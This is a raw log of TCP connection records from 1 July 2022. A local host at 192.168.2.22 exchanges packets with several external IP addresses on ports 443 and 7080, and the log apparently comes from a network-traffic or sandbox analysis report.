Jul 1, 2022 11:37:59.045933008 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.046008110 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.046257019 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.046333075 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.046372890 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.046446085 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.046668053 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.046746969 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.046783924 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.046855927 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.047122002 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.047195911 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.047236919 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.047303915 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.047468901 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.047540903 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.047586918 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.047657967 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.047817945 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.047894955 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.047930956 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.048005104 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.048165083 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.048249960 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.048280001 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.048351049 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.083444118 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.144201994 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.144347906 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.144516945 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.144561052 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.144584894 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.144648075 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.144649029 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.144676924 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.144723892 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.144742966 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.144788980 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.144865990 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.145009041 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.145082951 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.145123959 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.145199060 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.145334005 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.145406961 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.145448923 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.145529032 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.145658016 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.145734072 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.145772934 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.145848036 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.145946026 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.146044970 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.146078110 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.146150112 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.146203995 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.146260023 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.146404028 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.146481037 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.146517992 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.146596909 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.146727085 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.146809101 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.146868944 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.146941900 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.147079945 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.147176027 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.147195101 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.147274971 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.147401094 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.147475958 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.147510052 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.147582054 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.147703886 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.147784948 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.147819996 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.147896051 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.148097992 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.148170948 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.148180962 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.148196936 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.148230076 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.148247004 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.148258924 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.148308992 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:37:59.148317099 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.148366928 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.273156881 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.289113998 CEST | 49173 | 443 | 192.168.2.22 | 185.165.46.170 |
Jul 1, 2022 11:37:59.289169073 CEST | 443 | 49173 | 185.165.46.170 | 192.168.2.22 |
Jul 1, 2022 11:38:04.052871943 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:04.052920103 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:04.052985907 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:04.056211948 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:04.056236029 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:04.445300102 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:04.445424080 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:04.461366892 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:04.461394072 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:04.461756945 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:04.461812019 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:04.465454102 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:04.508506060 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:05.547277927 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:05.547348976 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:05.547391891 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:05.547401905 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:05.547477961 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:05.737293005 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:05.737452984 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:05.737838030 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:05.737958908 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:05.927150965 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:05.927265882 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:05.927299023 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:05.927366972 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:05.928003073 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:05.928073883 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:05.928680897 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:05.928769112 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:05.929363966 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:05.929456949 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.117808104 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.117939949 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.117970943 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.118037939 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.118849993 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.118944883 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.119527102 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.119601965 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.120039940 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.120105982 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.121352911 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.121421099 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.122014999 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.122083902 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.122955084 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.123030901 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.123624086 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.123692036 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.133222103 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.307910919 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.308060884 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.308666945 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.308758974 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.309283972 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.309367895 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.310112953 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.310208082 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.310863018 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.310955048 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.311450958 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.311538935 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.312133074 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.312236071 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.312798977 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.312894106 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.313472986 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.313560009 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.314177036 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.314284086 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.314832926 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.314905882 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.314922094 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.315524101 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.315613031 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.316184998 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.316271067 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.316878080 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.316970110 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.317550898 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.317646980 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.318228960 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.318320036 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.497668982 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.497806072 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.498253107 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.498333931 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.499128103 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.499211073 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.499567986 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.499643087 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.500277996 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.500413895 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.501012087 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.501105070 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.501627922 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.501713991 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.502326965 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.502418041 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.503118992 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.503321886 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.503820896 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.503927946 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.504508972 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.504606962 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.505115032 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.505240917 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.505776882 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.505872011 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.506455898 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.506551981 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.507137060 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.507230997 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.507814884 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.507911921 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.508512974 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.508614063 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.509392977 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.509491920 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.509855032 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.509938002 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.510529995 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.510624886 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.511214018 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.511296988 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.511888027 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.511970997 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.512593031 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.512679100 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.513289928 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.513390064 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.513926983 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.514009953 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.514607906 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.514688015 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.551023006 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.551137924 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.687542915 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.687638044 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.688306093 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.688385010 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.688925982 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.689007998 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.689616919 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.689680099 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.690300941 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.690365076 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.691015959 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.691095114 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.691694021 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.691766977 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.692388058 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.692472935 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.692965031 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.693042040 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.693046093 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.693093061 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.693205118 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.693229914 CEST | 443 | 49174 | 118.98.72.14 | 192.168.2.22 |
Jul 1, 2022 11:38:06.693239927 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:06.693295002 CEST | 49174 | 443 | 192.168.2.22 | 118.98.72.14 |
Jul 1, 2022 11:38:23.956139088 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:24.057538033 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:24.057678938 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:24.138194084 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:24.240129948 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:24.260747910 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:24.260777950 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:24.260910988 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:24.269234896 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:24.374835968 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:24.378806114 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:27.386748075 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:27.422867060 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:27.487987995 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:27.488187075 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:27.557605982 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:27.562689066 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:27.658879995 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:27.678715944 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:27.678749084 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:27.678790092 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:27.678838015 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:27.685606956 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:27.793987989 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:27.794807911 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
